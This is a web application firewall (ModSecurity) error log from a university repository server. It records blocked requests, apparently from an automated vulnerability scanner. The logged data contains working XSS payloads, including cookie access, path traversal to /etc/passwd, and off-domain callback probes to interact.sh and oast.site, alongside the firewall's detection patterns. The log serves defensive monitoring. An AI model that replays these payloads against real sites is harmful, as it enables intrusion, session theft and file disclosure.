[Tue Aug 29 11:56:57.540655 2023] [:error] [pid 2751] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:LGD_OID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:LGD_OID: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/mobile/shop/lg/mispwapurl.php"] [unique_id "ZO16mcCo-f0AAAq-Hj0AAAAT"]
[Tue Aug 29 11:56:59.807261 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:wordpress_user. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:wordpress_user: <script>alert(1)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/plugins/wordpress_sso/pages/index.php"] [unique_id "ZO16m8Co-f0AAAoz8V4AAAAS"]
[Tue Aug 29 11:57:01.019855 2023] [:error] [pid 2500] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:theme. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../../../../../ found within ARGS:theme: portal/../../../../../../../../../../../../../../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/bonita/portal/themeResource"] [unique_id "ZO16ncCo-f0AAAnEqVIAAAAO"]
[Tue Aug 29 11:57:01.535679 2023] [:error] [pid 2500] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:nm_member. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:nm_member: <script>alert(document.location)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/print.php"] [unique_id "ZO16ncCo-f0AAAnEqVUAAAAO"]
[Tue Aug 29 11:57:02.608479 2023] [:error] [pid 2751] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:command. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:command: <script>alert(document.cookie)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/webadmin/pkg"] [unique_id "ZO16nsCo-f0AAAq-HncAAAAT"]
[Tue Aug 29 11:57:02.663870 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:theme. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../../../../../ found within ARGS:theme: portal/../../../../../../../../../../../../../../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/bonita/portal/themeResource"] [unique_id "ZO16nsCo-f0AAAq5@bcAAAAK"]
[Tue Aug 29 11:57:05.752495 2023] [:error] [pid 2500] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:id: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-content/plugins/church-admin/includes/validate.php"] [unique_id "ZO16ocCo-f0AAAnEqWsAAAAO"]
[Tue Aug 29 11:57:07.585574 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:fieldId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:fieldId: \\x22<script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16o8Co-f0AAArB2AMAAAAV"]
[Tue Aug 29 11:57:07.846526 2023] [:error] [pid 2779] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:post_type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:post_type: </option><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16o8Co-f0AAArbWUwAAAAG"]
[Tue Aug 29 11:57:08.684784 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:jlbqg<script>alert("2Ue0JN1IxddkeI1vtwf86k4xLF5")</script>b7g0x. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: jlbqg<script found within ARGS_NAMES:jlbqg<script>alert(\\x222Ue0JN1IxddkeI1vtwf86k4xLF5\\x22)</script>b7g0x: jlbqg<script>alert(\\x222Ue0JN1IxddkeI1vtwf86k4xLF5\\x22)</script>b7g0x"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/"] [unique_id "ZO16pMCo-f0AAArB2BMAAAAV"]
[Tue Aug 29 11:57:08.725122 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-admin/admin.php"] [unique_id "ZO16pMCo-f0AAArB2BUAAAAV"]
[Tue Aug 29 11:57:11.851216 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:foodbakery_radius. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:foodbakery_radius: 10\\x22</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/listings/"] [unique_id "ZO16p8Co-f0AAAq5@f0AAAAK"]
[Tue Aug 29 11:57:12.024587 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:node_iconfilename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --NONE- found within ARGS:node_iconfilename: --NONE--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/plugins/weathermap/editor.php"] [unique_id "ZO16qMCo-f0AAAq5@gQAAAAK"]
[Tue Aug 29 11:57:18.559004 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://cjmnijtjmimvgniikdb0hujjy78m7id1x.oast.site found within TX:1: cjmnijtjmimvgniikdb0hujjy78m7id1x.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-content/plugins/qards/html2canvasproxy.php"] [unique_id "ZO16rsCo-f0AAAq5@iwAAAAK"]
[Tue Aug 29 11:57:18.675132 2023] [:error] [pid 2492] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:WaitDuration. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:WaitDuration: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/ProcessWait.aspx"] [unique_id "ZO16rsCo-f0AAAm80YYAAAAF"]
[Tue Aug 29 11:57:19.537304 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:POBatch. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:POBatch: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/ProcessWait.aspx"] [unique_id "ZO16r8Co-f0AAAqqtuoAAAAA"]
[Tue Aug 29 11:57:23.546274 2023] [:error] [pid 2779] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22/>< found within ARGS:type: \\x22/><svg/onload=\\x22alert(document.domain)\\x22/>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/badging/badge_template_v0.php"] [unique_id "ZO16s8Co-f0AAArbWaEAAAAG"]
[Tue Aug 29 11:57:26.206644 2023] [:error] [pid 2763] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../ found within ARGS:file: /themes/../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/includes/lib/gz.php"] [unique_id "ZO16tsCo-f0AAArLLjUAAAAb"]
[Tue Aug 29 11:57:26.240955 2023] [:error] [pid 2782] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:appservlang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ' found within ARGS:appservlang: <svg/onload=confirm('xss')>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16tsCo-f0AAArePKsAAAAJ"]
[Tue Aug 29 11:57:27.895045 2023] [:error] [pid 2785] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:swfloc. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:swfloc: \\x22><script>alert(1)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php"] [unique_id "ZO16t8Co-f0AAArh0ToAAAAC"]
[Tue Aug 29 11:57:30.556931 2023] [:error] [pid 2763] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:items[ITEMS][ID]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =\\x22/*\\x22>*/)}); found within ARGS:items[ITEMS][ID]: <a href=\\x22/*\\x22>*/)});function __MobileAppList(){alert(1)}//>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/bitrix/components/bitrix/mobileapp.list/ajax.php/"] [unique_id "ZO16usCo-f0AAArLLkgAAAAb"]
[Tue Aug 29 11:57:30.654340 2023] [:error] [pid 2785] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://\\x0a found within ARGS:url: javascript://\\x0aalert(document.domain)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/adm_program/system/redirect.php"] [unique_id "ZO16usCo-f0AAArh0UkAAAAC"]
[Tue Aug 29 11:57:30.745657 2023] [:error] [pid 2763] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:listing_list_view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:listing_list_view: standard13\\x22</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/listing/"] [unique_id "ZO16usCo-f0AAArLLlEAAAAb"]
[Tue Aug 29 11:57:31.701612 2023] [:error] [pid 2763] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:items[ITEMS][ID]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =\\x22//\\x0d\\x0a);//\\x22\\x22>< found within ARGS:items[ITEMS][ID]: <img src=\\x22//\\x0d\\x0a);//\\x22\\x22><div>x\\x0d\\x0a});var BX = window.BX;window.BX = function(node, bCache){};BX.ready = function(handler){};function __MobileAppList(test){alert(document.domain);};//</div>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/bitrix/components/bitrix/mobileapp.list/ajax.php/"] [unique_id "ZO16u8Co-f0AAArLLlgAAAAb"]
[Tue Aug 29 11:57:33.532607 2023] [:error] [pid 2786] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16vcCo-f0AAAriwiQAAAAK"]
[Tue Aug 29 11:57:33.632492 2023] [:error] [pid 2588] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../../ found within ARGS:fileName: ../../../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/ccmadmin/bulkvivewfilecontents.do"] [unique_id "ZO16vcCo-f0AAAocyu8AAAAR"]
[Tue Aug 29 12:53:53.198317 2023] [:error] [pid 4028] [client 180.244.138.110] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/Cover_Indryani_Rumasingap_page-0001.jpg.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZO2H8cCo-f0AAA@8mGEAAAAH"]
